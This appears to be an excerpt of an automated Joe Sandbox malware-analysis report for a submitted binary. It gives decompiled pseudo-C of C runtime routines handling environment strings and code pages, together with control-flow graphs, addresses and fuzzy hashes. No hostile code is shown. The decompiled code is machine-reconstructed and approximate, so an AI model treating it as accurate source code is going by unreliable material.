                                                                                                                                                                                                                                                                            				_t19 = GetEnvironmentStringsW();
                                                                                                                                                                                                                                                                            				if(_t19 != 0) {
                                                                                                                                                                                                                                                                            					_t12 = (E00381F02(_t19) - _t19 >> 1) + (E00381F02(_t19) - _t19 >> 1);
                                                                                                                                                                                                                                                                            					_t6 = E0037BF3C(_t14, (E00381F02(_t19) - _t19 >> 1) + (E00381F02(_t19) - _t19 >> 1)); // executed
                                                                                                                                                                                                                                                                            					_t18 = _t6;
                                                                                                                                                                                                                                                                            					if(_t18 != 0) {
                                                                                                                                                                                                                                                                            						E0037ED10(_t18, _t19, _t12);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					E0037A8FB(0);
                                                                                                                                                                                                                                                                            					FreeEnvironmentStringsW(_t19);
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t18 = 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t18;
                                                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                                                            0x00381f39
                                                                                                                                                                                                                                                                            0x00381f43
                                                                                                                                                                                                                                                                            0x00381f47
                                                                                                                                                                                                                                                                            0x00381f58
                                                                                                                                                                                                                                                                            0x00381f5c
                                                                                                                                                                                                                                                                            0x00381f61
                                                                                                                                                                                                                                                                            0x00381f67
                                                                                                                                                                                                                                                                            0x00381f6c
                                                                                                                                                                                                                                                                            0x00381f71
                                                                                                                                                                                                                                                                            0x00381f76
                                                                                                                                                                                                                                                                            0x00381f7d
                                                                                                                                                                                                                                                                            0x00381f49
                                                                                                                                                                                                                                                                            0x00381f49
                                                                                                                                                                                                                                                                            0x00381f49
                                                                                                                                                                                                                                                                            0x00381f88

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00381F3D
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00381F76
                                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00381F7D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2716640707-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0b5274be3305f07629303cfb82d82d9328590f2b3d39a92d482bc7d96237d4eb
                                                                                                                                                                                                                                                                            • Instruction ID: 7db32fff7635ea008912f33b378d9518f5eaef6367d550df358023043833e2c5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b5274be3305f07629303cfb82d82d9328590f2b3d39a92d482bc7d96237d4eb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DE06537109B116AA22333296C49AAF3A1CCFD5775B260295F5489A241DF248D0352B2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 124 37b448-37b47c GetCPInfo 125 37b572-37b57f 124->125 126 37b482 124->126 127 37b585-37b595 125->127 128 37b484-37b48e 126->128 129 37b597-37b59f 127->129 130 37b5a1-37b5a8 127->130 128->128 131 37b490-37b4a3 128->131 132 37b5b4-37b5b6 129->132 133 37b5aa-37b5b1 130->133 134 37b5b8 130->134 135 37b4c4-37b4c6 131->135 138 37b5ba-37b5c9 132->138 133->132 134->138 136 37b4a5-37b4ac 135->136 137 37b4c8-37b4ff call 37a71e call 37cc66 135->137 139 37b4bb-37b4bd 136->139 149 37b504-37b52f call 37cc66 137->149 138->127 141 37b5cb-37b5db call 37de3e 138->141 142 37b4bf-37b4c2 139->142 143 37b4ae-37b4b0 139->143 142->135 143->142 146 37b4b2-37b4ba 143->146 146->139 152 37b531-37b53b 149->152 153 37b53d-37b549 152->153 154 37b54b-37b54d 152->154 155 37b55b-37b562 153->155 156 37b564 154->156 157 37b54f-37b554 154->157 158 37b56b-37b56e 155->158 156->158 157->155 158->152 159 37b570 158->159 159->141
                                                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                                                            			E0037B448(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				char _v264;
                                                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                                                            				char _v776;
                                                                                                                                                                                                                                                                            				char _v1800;
                                                                                                                                                                                                                                                                            				char _v1814;
                                                                                                                                                                                                                                                                            				struct _cpinfo _v1820;
                                                                                                                                                                                                                                                                            				intOrPtr _v1824;
                                                                                                                                                                                                                                                                            				signed int _v1828;
                                                                                                                                                                                                                                                                            				signed int _t63;
                                                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                                                            				signed int _t68;
                                                                                                                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                                                                            				char _t73;
                                                                                                                                                                                                                                                                            				char _t74;
                                                                                                                                                                                                                                                                            				signed char _t75;
                                                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                                                            				signed char _t86;
                                                                                                                                                                                                                                                                            				char _t87;
                                                                                                                                                                                                                                                                            				char _t90;
                                                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                                                            				signed int _t94;
                                                                                                                                                                                                                                                                            				signed int _t95;
                                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                                            				char* _t97;
                                                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                                                            				signed int _t102;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t95 = __edx;
                                                                                                                                                                                                                                                                            				_t63 =  *0x40db44; // 0x1f0d8c9c
                                                                                                                                                                                                                                                                            				_v8 = _t63 ^ _t102;
                                                                                                                                                                                                                                                                            				_t101 = _a4;
                                                                                                                                                                                                                                                                            				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
                                                                                                                                                                                                                                                                            					_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                                            					_t90 = 0;
                                                                                                                                                                                                                                                                            					_t67 = 0xffffff9f;
                                                                                                                                                                                                                                                                            					_t68 = _t67 - _t96;
                                                                                                                                                                                                                                                                            					__eflags = _t68;
                                                                                                                                                                                                                                                                            					_v1828 = _t68;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_t97 = _t96 + _t90;
                                                                                                                                                                                                                                                                            						_t69 = _t68 + _t97;
                                                                                                                                                                                                                                                                            						_v1824 = _t69;
                                                                                                                                                                                                                                                                            						__eflags = _t69 + 0x20 - 0x19;
                                                                                                                                                                                                                                                                            						if(_t69 + 0x20 > 0x19) {
                                                                                                                                                                                                                                                                            							__eflags = _v1824 - 0x19;
                                                                                                                                                                                                                                                                            							if(_v1824 > 0x19) {
                                                                                                                                                                                                                                                                            								 *_t97 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_t72 = _t101 + _t90;
                                                                                                                                                                                                                                                                            								_t57 = _t72 + 0x19;
                                                                                                                                                                                                                                                                            								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                                            								__eflags =  *_t57;
                                                                                                                                                                                                                                                                            								_t59 = _t90 - 0x20; // -32
                                                                                                                                                                                                                                                                            								_t73 = _t59;
                                                                                                                                                                                                                                                                            								goto L24;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                                            							_t54 = _t90 + 0x20; // 0x20
                                                                                                                                                                                                                                                                            							_t73 = _t54;
                                                                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                                                                            							 *_t97 = _t73;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t68 = _v1828;
                                                                                                                                                                                                                                                                            						_t96 = _t101 + 0x119;
                                                                                                                                                                                                                                                                            						_t90 = _t90 + 1;
                                                                                                                                                                                                                                                                            						__eflags = _t90 - 0x100;
                                                                                                                                                                                                                                                                            					} while (_t90 < 0x100);
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t74 = 0;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
                                                                                                                                                                                                                                                                            						_t74 = _t74 + 1;
                                                                                                                                                                                                                                                                            					} while (_t74 < 0x100);
                                                                                                                                                                                                                                                                            					_t75 = _v1814;
                                                                                                                                                                                                                                                                            					_t93 =  &_v1814;
                                                                                                                                                                                                                                                                            					_v264 = 0x20;
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						_t108 = _t75;
                                                                                                                                                                                                                                                                            						if(_t75 == 0) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t95 =  *(_t93 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                            						_t76 = _t75 & 0x000000ff;
                                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                                            							__eflags = _t76 - _t95;
                                                                                                                                                                                                                                                                            							if(_t76 > _t95) {
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__eflags = _t76 - 0x100;
                                                                                                                                                                                                                                                                            							if(_t76 < 0x100) {
                                                                                                                                                                                                                                                                            								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
                                                                                                                                                                                                                                                                            								_t76 = _t76 + 1;
                                                                                                                                                                                                                                                                            								__eflags = _t76;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t93 = _t93 + 2;
                                                                                                                                                                                                                                                                            						__eflags = _t93;
                                                                                                                                                                                                                                                                            						_t75 =  *_t93;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					E0037A71E(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                                            					E0037CC66(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0); // executed
                                                                                                                                                                                                                                                                            					E0037CC66(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                                            					_t94 = 0;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
                                                                                                                                                                                                                                                                            						if((_t86 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                            							__eflags = _t86 & 0x00000002;
                                                                                                                                                                                                                                                                            							if((_t86 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                            								 *((char*)(_t101 + _t94 + 0x119)) = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_t37 = _t101 + _t94 + 0x19;
                                                                                                                                                                                                                                                                            								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                                            								__eflags =  *_t37;
                                                                                                                                                                                                                                                                            								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
                                                                                                                                                                                                                                                                            								goto L15;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
                                                                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                                                                            							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                            					} while (_t94 < 0x100);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return E0037DE3E(_v8 ^ _t102);
                                                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                                                            0x0037b448
                                                                                                                                                                                                                                                                            0x0037b453
                                                                                                                                                                                                                                                                            0x0037b45a
                                                                                                                                                                                                                                                                            0x0037b45f
                                                                                                                                                                                                                                                                            0x0037b47c
                                                                                                                                                                                                                                                                            0x0037b574
                                                                                                                                                                                                                                                                            0x0037b57a
                                                                                                                                                                                                                                                                            0x0037b57c
                                                                                                                                                                                                                                                                            0x0037b57d
                                                                                                                                                                                                                                                                            0x0037b57d
                                                                                                                                                                                                                                                                            0x0037b57f
                                                                                                                                                                                                                                                                            0x0037b585
                                                                                                                                                                                                                                                                            0x0037b585
                                                                                                                                                                                                                                                                            0x0037b587
                                                                                                                                                                                                                                                                            0x0037b589
                                                                                                                                                                                                                                                                            0x0037b592
                                                                                                                                                                                                                                                                            0x0037b595
                                                                                                                                                                                                                                                                            0x0037b5a1
                                                                                                                                                                                                                                                                            0x0037b5a8
                                                                                                                                                                                                                                                                            0x0037b5b8
                                                                                                                                                                                                                                                                            0x0037b5aa
                                                                                                                                                                                                                                                                            0x0037b5aa
                                                                                                                                                                                                                                                                            0x0037b5ad
                                                                                                                                                                                                                                                                            0x0037b5ad
                                                                                                                                                                                                                                                                            0x0037b5ad
                                                                                                                                                                                                                                                                            0x0037b5b1
                                                                                                                                                                                                                                                                            0x0037b5b1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b5b1
                                                                                                                                                                                                                                                                            0x0037b597
                                                                                                                                                                                                                                                                            0x0037b597
                                                                                                                                                                                                                                                                            0x0037b59c
                                                                                                                                                                                                                                                                            0x0037b59c
                                                                                                                                                                                                                                                                            0x0037b5b4
                                                                                                                                                                                                                                                                            0x0037b5b4
                                                                                                                                                                                                                                                                            0x0037b5b4
                                                                                                                                                                                                                                                                            0x0037b5ba
                                                                                                                                                                                                                                                                            0x0037b5c0
                                                                                                                                                                                                                                                                            0x0037b5c6
                                                                                                                                                                                                                                                                            0x0037b5c7
                                                                                                                                                                                                                                                                            0x0037b5c7
                                                                                                                                                                                                                                                                            0x0037b482
                                                                                                                                                                                                                                                                            0x0037b482
                                                                                                                                                                                                                                                                            0x0037b484
                                                                                                                                                                                                                                                                            0x0037b484
                                                                                                                                                                                                                                                                            0x0037b48b
                                                                                                                                                                                                                                                                            0x0037b48c
                                                                                                                                                                                                                                                                            0x0037b490
                                                                                                                                                                                                                                                                            0x0037b496
                                                                                                                                                                                                                                                                            0x0037b49c
                                                                                                                                                                                                                                                                            0x0037b4c4
                                                                                                                                                                                                                                                                            0x0037b4c4
                                                                                                                                                                                                                                                                            0x0037b4c6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b4a5
                                                                                                                                                                                                                                                                            0x0037b4a9
                                                                                                                                                                                                                                                                            0x0037b4bb
                                                                                                                                                                                                                                                                            0x0037b4bb
                                                                                                                                                                                                                                                                            0x0037b4bd
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b4ae
                                                                                                                                                                                                                                                                            0x0037b4b0
                                                                                                                                                                                                                                                                            0x0037b4b2
                                                                                                                                                                                                                                                                            0x0037b4ba
                                                                                                                                                                                                                                                                            0x0037b4ba
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b4ba
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b4b0
                                                                                                                                                                                                                                                                            0x0037b4bf
                                                                                                                                                                                                                                                                            0x0037b4bf
                                                                                                                                                                                                                                                                            0x0037b4c2
                                                                                                                                                                                                                                                                            0x0037b4c2
                                                                                                                                                                                                                                                                            0x0037b4de
                                                                                                                                                                                                                                                                            0x0037b4ff
                                                                                                                                                                                                                                                                            0x0037b527
                                                                                                                                                                                                                                                                            0x0037b52f
                                                                                                                                                                                                                                                                            0x0037b531
                                                                                                                                                                                                                                                                            0x0037b531
                                                                                                                                                                                                                                                                            0x0037b53b
                                                                                                                                                                                                                                                                            0x0037b54b
                                                                                                                                                                                                                                                                            0x0037b54d
                                                                                                                                                                                                                                                                            0x0037b564
                                                                                                                                                                                                                                                                            0x0037b54f
                                                                                                                                                                                                                                                                            0x0037b54f
                                                                                                                                                                                                                                                                            0x0037b54f
                                                                                                                                                                                                                                                                            0x0037b54f
                                                                                                                                                                                                                                                                            0x0037b554
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037b554
                                                                                                                                                                                                                                                                            0x0037b53d
                                                                                                                                                                                                                                                                            0x0037b53d
                                                                                                                                                                                                                                                                            0x0037b542
                                                                                                                                                                                                                                                                            0x0037b55b
                                                                                                                                                                                                                                                                            0x0037b55b
                                                                                                                                                                                                                                                                            0x0037b55b
                                                                                                                                                                                                                                                                            0x0037b56b
                                                                                                                                                                                                                                                                            0x0037b56c
                                                                                                                                                                                                                                                                            0x0037b570
                                                                                                                                                                                                                                                                            0x0037b5db

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Info
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: d9733e62aa0346a763c6bd8e8c35736ca995b6754cfe7a12fe73cc892a27be60
                                                                                                                                                                                                                                                                            • Instruction ID: ac866cca216dc18b4683109ca3a74a44b3e771a69a4a6c0293facd81cf49ec3b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9733e62aa0346a763c6bd8e8c35736ca995b6754cfe7a12fe73cc892a27be60
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA4106705042889EDB338E648D84BFAFBBEEB46714F1444ECE58E87142D3399A45DF60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 160 37b79d-37b7c1 call 37b370 163 37b7c3-37b7cc call 37b3e3 160->163 164 37b7d1-37b7d8 160->164 171 37b97e-37b98d call 37de3e 163->171 166 37b7db-37b7e1 164->166 168 37b7e7-37b7f3 166->168 169 37b8d1-37b8f0 call 37f290 166->169 168->166 172 37b7f5-37b7fb 168->172 179 37b8f3-37b8f8 169->179 173 37b801-37b807 172->173 174 37b8c9-37b8cc 172->174 173->174 177 37b80d-37b819 IsValidCodePage 173->177 178 37b97d 174->178 177->174 181 37b81f-37b82c GetCPInfo 177->181 178->171 182 37b92f-37b939 179->182 183 37b8fa-37b8ff 179->183 184 37b8b6-37b8bc 181->184 185 37b832-37b853 call 37f290 181->185 182->179 186 37b93b-37b962 call 37b332 182->186 187 37b901-37b907 183->187 188 37b92c 183->188 184->174 189 37b8be-37b8c4 call 37b3e3 184->189 199 37b8a6 185->199 200 37b855-37b85c 185->200 201 37b963-37b972 186->201 192 37b920-37b922 187->192 188->182 204 37b97a-37b97b 189->204 193 37b924-37b92a 192->193 194 37b909-37b90f 192->194 193->183 193->188 194->193 202 37b911-37b91c 194->202 203 37b8a9-37b8b1 199->203 205 37b87f-37b882 200->205 206 37b85e-37b863 200->206 201->201 207 37b974-37b975 call 37b448 201->207 202->192 203->207 204->178 210 37b887-37b88e 205->210 206->205 208 37b865-37b86b 206->208 207->204 211 37b873-37b875 208->211 210->210 212 37b890-37b8a4 call 37b332 210->212 213 37b877-37b87d 211->213 214 37b86d-37b872 211->214 212->203 213->205 213->206 214->211
                                                                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                                                                            			E0037B79D(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				char _v22;
                                                                                                                                                                                                                                                                            				struct _cpinfo _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                                                            				int _t51;
                                                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                                                            				short _t58;
                                                                                                                                                                                                                                                                            				signed char _t62;
                                                                                                                                                                                                                                                                            				signed int _t63;
                                                                                                                                                                                                                                                                            				signed char* _t72;
                                                                                                                                                                                                                                                                            				signed char* _t73;
                                                                                                                                                                                                                                                                            				int _t78;
                                                                                                                                                                                                                                                                            				signed int _t81;
                                                                                                                                                                                                                                                                            				signed char* _t82;
                                                                                                                                                                                                                                                                            				short* _t83;
                                                                                                                                                                                                                                                                            				int _t87;
                                                                                                                                                                                                                                                                            				signed char _t88;
                                                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                                                            				signed int _t91;
                                                                                                                                                                                                                                                                            				signed int _t92;
                                                                                                                                                                                                                                                                            				int _t94;
                                                                                                                                                                                                                                                                            				int _t95;
                                                                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                                                                            				signed int _t99;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t48 =  *0x40db44; // 0x1f0d8c9c
                                                                                                                                                                                                                                                                            				_v8 = _t48 ^ _t99;
                                                                                                                                                                                                                                                                            				_t98 = _a8;
                                                                                                                                                                                                                                                                            				_t78 = E0037B370(__eflags, _a4);
                                                                                                                                                                                                                                                                            				if(_t78 != 0) {
                                                                                                                                                                                                                                                                            					_t94 = 0;
                                                                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                                                                            					_t81 = 0;
                                                                                                                                                                                                                                                                            					_t51 = 0;
                                                                                                                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t51 + 0x40d5b8)) - _t78;
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t51 + 0x40d5b8)) == _t78) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                            						_t51 = _t51 + 0x30;
                                                                                                                                                                                                                                                                            						_v32 = _t81;
                                                                                                                                                                                                                                                                            						__eflags = _t51 - 0xf0;
                                                                                                                                                                                                                                                                            						if(_t51 < 0xf0) {
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							__eflags = _t78 - 0xfde8;
                                                                                                                                                                                                                                                                            							if(_t78 == 0xfde8) {
                                                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								__eflags = _t78 - 0xfde9;
                                                                                                                                                                                                                                                                            								if(_t78 == 0xfde9) {
                                                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
                                                                                                                                                                                                                                                                            									__eflags = _t51;
                                                                                                                                                                                                                                                                            									if(_t51 == 0) {
                                                                                                                                                                                                                                                                            										goto L23;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_t51 = GetCPInfo(_t78,  &_v28);
                                                                                                                                                                                                                                                                            										__eflags = _t51;
                                                                                                                                                                                                                                                                            										if(_t51 == 0) {
                                                                                                                                                                                                                                                                            											__eflags =  *0x40df4c - _t94; // 0x0
                                                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                                                            												goto L23;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												E0037B3E3(_t98);
                                                                                                                                                                                                                                                                            												goto L37;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											E0037F290(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                                            											 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                                            											 *(_t98 + 0x21c) = _t94;
                                                                                                                                                                                                                                                                            											_t78 = 1;
                                                                                                                                                                                                                                                                            											__eflags = _v28 - 1;
                                                                                                                                                                                                                                                                            											if(_v28 <= 1) {
                                                                                                                                                                                                                                                                            												 *(_t98 + 8) = _t94;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												__eflags = _v22;
                                                                                                                                                                                                                                                                            												_t72 =  &_v22;
                                                                                                                                                                                                                                                                            												if(_v22 != 0) {
                                                                                                                                                                                                                                                                            													while(1) {
                                                                                                                                                                                                                                                                            														_t88 = _t72[1];
                                                                                                                                                                                                                                                                            														__eflags = _t88;
                                                                                                                                                                                                                                                                            														if(_t88 == 0) {
                                                                                                                                                                                                                                                                            															goto L16;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														_t91 = _t88 & 0x000000ff;
                                                                                                                                                                                                                                                                            														_t89 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                                                                                            														while(1) {
                                                                                                                                                                                                                                                                            															__eflags = _t89 - _t91;
                                                                                                                                                                                                                                                                            															if(_t89 > _t91) {
                                                                                                                                                                                                                                                                            																break;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
                                                                                                                                                                                                                                                                            															_t89 = _t89 + 1;
                                                                                                                                                                                                                                                                            															__eflags = _t89;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														_t72 =  &(_t72[2]);
                                                                                                                                                                                                                                                                            														__eflags =  *_t72;
                                                                                                                                                                                                                                                                            														if( *_t72 != 0) {
                                                                                                                                                                                                                                                                            															continue;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														goto L16;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												L16:
                                                                                                                                                                                                                                                                            												_t73 = _t98 + 0x1a;
                                                                                                                                                                                                                                                                            												_t87 = 0xfe;
                                                                                                                                                                                                                                                                            												do {
                                                                                                                                                                                                                                                                            													 *_t73 =  *_t73 | 0x00000008;
                                                                                                                                                                                                                                                                            													_t73 =  &(_t73[1]);
                                                                                                                                                                                                                                                                            													_t87 = _t87 - 1;
                                                                                                                                                                                                                                                                            													__eflags = _t87;
                                                                                                                                                                                                                                                                            												} while (_t87 != 0);
                                                                                                                                                                                                                                                                            												 *(_t98 + 0x21c) = E0037B332( *(_t98 + 4));
                                                                                                                                                                                                                                                                            												 *(_t98 + 8) = _t78;
